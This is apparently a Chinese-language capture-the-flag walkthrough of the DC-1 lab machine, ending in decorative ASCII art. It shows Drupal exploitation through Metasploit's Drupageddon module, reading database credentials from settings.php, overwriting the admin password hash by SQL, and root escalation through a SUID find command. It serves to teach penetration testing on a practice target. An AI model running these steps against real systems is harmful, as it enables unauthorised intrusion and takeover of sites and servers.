今天打一下DC1号
老样子先看看端口
发现是Drupal网页,直接利用msfconsole工具进行渗透
寻找相关漏洞,这里可以看到drupal_drupageddon是不检查的,我们就决定使用他了
设定空缺的RHOST,进行运行
此时已经连接成功了
利用python -c ‘import pty; pty.spawn(“/bin/bash”)’ 来使页面看起来更加的美观舒适(注意这里要先shell一下)
拿下flag1
继续深入,flag1给出线索说是在网站的设置文件中,我们找找他的setting文件,发现在./sites/default/settings.php中,查看文件
找到flag2,他告诉我数据库的账号和密码
尝试登入数据库,mysql -u****** -p******
查看账号和密码
select * from (table名)\G(格式美观);
admin的密码应该是某种hash,也不好直接解密,
去找找文件中有加密的文件,发现此文件是直接输入数字然后返回加密值,直接生成123的hash值
重新回到mysql将admin密码的hash值改掉
update users set pass=”$S$DcETO8zl/D/dbIVNl9Qm1lVAqiBCukAczer74V5TDCtuRi5MeoMC” where uid=1;
登入网站,找到flag 3
他这里说让我们利用find suid进行提权
先试试SUID提权,查看默认以root权限执行的程序
find / -perm -u=s -type f 2>/dev/null
find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)
ok啊,那我们就直接find提权
find / -exec “/bin/bash” -p ;
成功提权。利用find寻找剩下的flag
flag4
finalflag
完美落幕
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣤⣤⣶⣶⣶⣶⣤⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⣫⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⢿⣿⣿⣿⣿⠟⣹⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣵⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠈⠻⣿⣷⣦⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠉⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣌⣧⠀⠂⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢧⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⡻⡿⡏⠋⠛⠓⠀⠀⡀⣴⣴⣶⣶⣶⣤⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢰⡏⣿⣿⣿⣿⣿⡟⣿⣿⣦⠀⠀⠀⠀⠈⠀⠿⠭⠝⠙⠁⠀⠀⠀⡴⢾⣿⣿⣿⣿⣿⣿⣾⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⣽⡿⣿⣿⣿⡆⠈⠿⠚⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⡃⠃⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠸⣇⣿⣿⣾⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⣯⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠿⢿⣿⣿⣯⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⢹⣿⡟⠢⢄⠀⠀⠀⠀⠀⢀⣤⠖⠁⠀⡌⣨⣿⣿⣿⣿⣿⣿⣿⣿⡿⣿⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠏⣿⣯⣿⣿⣳⠀⡄⠁⠢⠤⢤⣾⡿⠋⠀⠀⠀⣥⡿⣿⣿⣿⢏⣿⣿⣿⣿⢠⣿⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢟⣿⣿⡿⠟⠁⠡⣌⡠⡀⠀⠀⣸⠋⠀⠀⠀⠀⠀⢢⠴⠿⠟⢡⣾⣿⣿⣿⠃⣼⠃⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⢠⡾⠿⠋⠀⠀⠀⠀⠀⣉⣿⠿⠋⠁⠀⠀⢀⢀⣀⣴⢾⡻⣿⣾⣿⣿⣿⡿⠃⠊⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡌⠀⠀⠀⠀⣠⡴⠞⠋⠀⠀⠀⠐⠛⠛⣿⣿⣟⣁⡀⠐⠲⠟⠿⠛⢯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣾⣶⣤⣦⣴⣾⣏⣀⣀⢀⠀⠀⠐⣀⠂⠉⠉⠀⠀⢀⣠⣅⠁⠂⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⡠⠟⢩⣿⡿⠟⠉⠈⠻⢷⠄⠀⠀⡀⠀⠈⠁⠀⢀⠀⢐⣿⠿⠛⠁⣿⣆⡀⠈⠲⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣰⣎⡀⢀⡜⠋⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⢀⣄⣤⣿⣿⡷⠏⠀⠀⠀⣴⣿⣿⡿⠞⠀⢑⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⣀⡴⢿⣿⠟⠉⠁⠀⠀⠀⢀⣾⣿⣿⣿⡇⠀⠀⡀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣀⣴⣶⣾⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢀⡠⠘⠁⣠⠾⠅⠀⠒⢒⣄⣠⣰⣿⣿⣿⣿⡿⠃⠀⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣼⡄⢀⣴⡁⠀⠀⠀⠀⠀⠀⣀⣠⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣴⡿⠥⢤⣤⣀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠁⠀⢸⣿⣿⣿⣿⠓⠤⡀⠀⢻⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⢝⡀⢀⠜⠛⠋⠁⠀⠀⠀⢀⠳⣼⣿⣿⣿⣿⣿⣿⣿⣧⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣡⣾⣷⡤⠁⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⡠⠀⠀⠀⠀⠀⠀⠈⠻⡿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⠟⠋⢡⠜⠁⠀⠀⠀⠀⠀⡠⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠘⢝⠻⠛⠉⠀⠀⠀⠀⠀⠡⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣏⠀⡐⠃⠀⠀⠀⠀⠀⢀⣾⣿⡢⠤⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠑⣄⠀⠀⠀⠀⠀⠀⠀⠑⠀⠀⠀⠀⠀